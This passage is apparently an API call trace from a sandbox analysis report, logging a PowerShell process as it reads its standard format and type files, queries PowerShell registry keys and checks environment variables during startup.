	[0627.334] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.335] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.335] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.335] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.336] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.336] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.337] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.337] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.337] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.338] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.338] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.338] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.346] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.347] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.347] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.347] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.348] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.348] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.349] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.349] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.349] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x1b4, lpOverlapped=0x0) returned 1
	[0627.350] ReadFile (in: hFile=0x324, lpBuffer=0x2d72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d72250*, lpNumberOfBytesRead=0x26d2c8*=0x0, lpOverlapped=0x0) returned 1
	[0627.350] CloseHandle (hObject=0x324) returned 1
	[0627.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0627.350] SetErrorMode (uMode=0x1) returned 0x1
	[0627.350] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d240 | out: lpFileInformation=0x26d240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0627.350] SetErrorMode (uMode=0x1) returned 0x1
	[0627.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0627.351] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d328 | out: phkResult=0x26d328*=0x324) returned 0x0
	[0627.351] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d2ac, lpData=0x0, lpcbData=0x26d2a8*=0x0 | out: lpType=0x26d2ac*=0x1, lpData=0x0, lpcbData=0x26d2a8*=0x56) returned 0x0
	[0627.351] CoTaskMemAlloc (cb=0x5a) returned 0x42d490
	[0627.351] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d27c, lpData=0x42d490, lpcbData=0x26d278*=0x56 | out: lpType=0x26d27c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d278*=0x56) returned 0x0
	[0627.351] CoTaskMemFree (pv=0x42d490) 
	[0627.351] RegCloseKey (hKey=0x324) returned 0x0
	[0627.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0627.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0630.135] VirtualQuery (in: lpAddress=0x26c010, lpBuffer=0x26ced0, dwLength=0x30 | out: lpBuffer=0x26ced0*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0633.089] VirtualQuery (in: lpAddress=0x26c010, lpBuffer=0x26ced0, dwLength=0x30 | out: lpBuffer=0x26ced0*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0633.103] VirtualQuery (in: lpAddress=0x26c010, lpBuffer=0x26ced0, dwLength=0x30 | out: lpBuffer=0x26ced0*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0633.104] VirtualQuery (in: lpAddress=0x26c010, lpBuffer=0x26ced0, dwLength=0x30 | out: lpBuffer=0x26ced0*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0635.192] VirtualQuery (in: lpAddress=0x26c010, lpBuffer=0x26ced0, dwLength=0x30 | out: lpBuffer=0x26ced0*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0635.194] VirtualQuery (in: lpAddress=0x26c010, lpBuffer=0x26ced0, dwLength=0x30 | out: lpBuffer=0x26ced0*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0638.960] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0638.960] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0638.960] CoTaskMemFree (pv=0x44bd30) 
	[0638.983] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4c8 | out: phkResult=0x26d4c8*=0x324) returned 0x0
	[0638.983] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x26d4dc, lpData=0x0, lpcbData=0x26d4d8*=0x0 | out: lpType=0x26d4dc*=0x1, lpData=0x0, lpcbData=0x26d4d8*=0x74) returned 0x0
	[0638.983] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x26d44c, lpData=0x0, lpcbData=0x26d448*=0x0 | out: lpType=0x26d44c*=0x1, lpData=0x0, lpcbData=0x26d448*=0x74) returned 0x0
	[0638.983] CoTaskMemAlloc (cb=0x78) returned 0x3d0500
	[0638.983] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x26d41c, lpData=0x3d0500, lpcbData=0x26d418*=0x74 | out: lpType=0x26d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x26d418*=0x74) returned 0x0
	[0638.984] CoTaskMemFree (pv=0x3d0500) 
	[0638.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0638.984] SetErrorMode (uMode=0x1) returned 0x1
	[0638.984] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x26d3a0 | out: lpFileInformation=0x26d3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0638.984] SetErrorMode (uMode=0x1) returned 0x1
	[0638.985] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0638.985] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0638.985] CoTaskMemFree (pv=0x44bd30) 
	[0638.990] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0638.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0638.990] CoTaskMemFree (pv=0x44bd30) 
	[0638.991] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0638.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0638.991] CoTaskMemFree (pv=0x44bd30) 
	[0638.991] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0638.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0638.991] CoTaskMemFree (pv=0x44bd30) 
	[0638.992] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0638.992] GetFileType (hFile=0x2fc) returned 0x1
	[0638.992] SetErrorMode (uMode=0x1) returned 0x1
	[0638.992] GetFileType (hFile=0x2fc) returned 0x1
	[0638.992] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b4588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x33b4588*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0640.699] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b4588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x33b4588*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0640.700] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b4588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x33b4588*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0640.700] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b4588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x33b4588*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0640.701] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b4588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x33b4588*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0640.701] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b4588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x33b4588*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0640.701] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b4588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x33b4588*, lpNumberOfBytesRead=0x26d038*=0x9e2, lpOverlapped=0x0) returned 1
	[0640.701] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b3ad2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x33b3ad2*, lpNumberOfBytesRead=0x26d038*=0x0, lpOverlapped=0x0) returned 1
	[0640.701] ReadFile (in: hFile=0x2fc, lpBuffer=0x33b4588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x33b4588*, lpNumberOfBytesRead=0x26d038*=0x0, lpOverlapped=0x0) returned 1
	[0640.702] CloseHandle (hObject=0x2fc) returned 1
	[0640.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0640.702] SetErrorMode (uMode=0x1) returned 0x1
	[0640.702] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cfe0 | out: lpFileInformation=0x26cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0640.702] SetErrorMode (uMode=0x1) returned 0x1
	[0640.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0640.703] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0c8 | out: phkResult=0x26d0c8*=0x2fc) returned 0x0
	[0640.703] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d04c, lpData=0x0, lpcbData=0x26d048*=0x0 | out: lpType=0x26d04c*=0x1, lpData=0x0, lpcbData=0x26d048*=0x56) returned 0x0
	[0640.703] CoTaskMemAlloc (cb=0x5a) returned 0x1ba35890
	[0640.703] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d01c, lpData=0x1ba35890, lpcbData=0x26d018*=0x56 | out: lpType=0x26d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d018*=0x56) returned 0x0
	[0640.703] CoTaskMemFree (pv=0x1ba35890) 
	[0640.703] RegCloseKey (hKey=0x2fc) returned 0x0
	[0640.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0640.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0641.690] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x91177d67, Data2=0xa41f, Data3=0x4a5b, Data4=([0]=0x9b, [1]=0xc9, [2]=0x8b, [3]=0xfc, [4]=0x54, [5]=0x38, [6]=0x88, [7]=0x6a))) returned 0x0
	[0641.705] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x9ea26c3a, Data2=0x3266, Data3=0x474d, Data4=([0]=0xb4, [1]=0xae, [2]=0xfc, [3]=0xee, [4]=0x9d, [5]=0x3a, [6]=0x79, [7]=0x12))) returned 0x0
	[0641.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0641.708] SetErrorMode (uMode=0x1) returned 0x1
	[0641.708] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0641.709] GetFileType (hFile=0x324) returned 0x1
	[0641.709] SetErrorMode (uMode=0x1) returned 0x1
	[0641.709] GetFileType (hFile=0x324) returned 0x1
	[0641.709] ReadFile (in: hFile=0x324, lpBuffer=0x2dc5348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2dc5348*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0644.092] ReadFile (in: hFile=0x324, lpBuffer=0x2dc5348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2dc5348*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0644.092] ReadFile (in: hFile=0x324, lpBuffer=0x2dc5348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2dc5348*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0644.092] ReadFile (in: hFile=0x324, lpBuffer=0x2dc5348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2dc5348*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0644.092] ReadFile (in: hFile=0x324, lpBuffer=0x2dc5348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2dc5348*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0644.093] ReadFile (in: hFile=0x324, lpBuffer=0x2dc5348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2dc5348*, lpNumberOfBytesRead=0x26d038*=0xfb2, lpOverlapped=0x0) returned 1
	[0644.093] ReadFile (in: hFile=0x324, lpBuffer=0x2dc4a62, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2dc4a62*, lpNumberOfBytesRead=0x26d038*=0x0, lpOverlapped=0x0) returned 1
	[0644.093] ReadFile (in: hFile=0x324, lpBuffer=0x2dc5348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2dc5348*, lpNumberOfBytesRead=0x26d038*=0x0, lpOverlapped=0x0) returned 1
	[0644.093] CloseHandle (hObject=0x324) returned 1
	[0644.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0644.093] SetErrorMode (uMode=0x1) returned 0x1
	[0644.094] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cfe0 | out: lpFileInformation=0x26cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0644.094] SetErrorMode (uMode=0x1) returned 0x1
	[0644.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0644.094] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0c8 | out: phkResult=0x26d0c8*=0x324) returned 0x0
	[0644.094] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d04c, lpData=0x0, lpcbData=0x26d048*=0x0 | out: lpType=0x26d04c*=0x1, lpData=0x0, lpcbData=0x26d048*=0x56) returned 0x0
	[0644.094] CoTaskMemAlloc (cb=0x5a) returned 0x1ba35890
	[0644.094] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d01c, lpData=0x1ba35890, lpcbData=0x26d018*=0x56 | out: lpType=0x26d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d018*=0x56) returned 0x0
	[0644.094] CoTaskMemFree (pv=0x1ba35890) 
	[0644.094] RegCloseKey (hKey=0x324) returned 0x0
	[0644.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0644.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
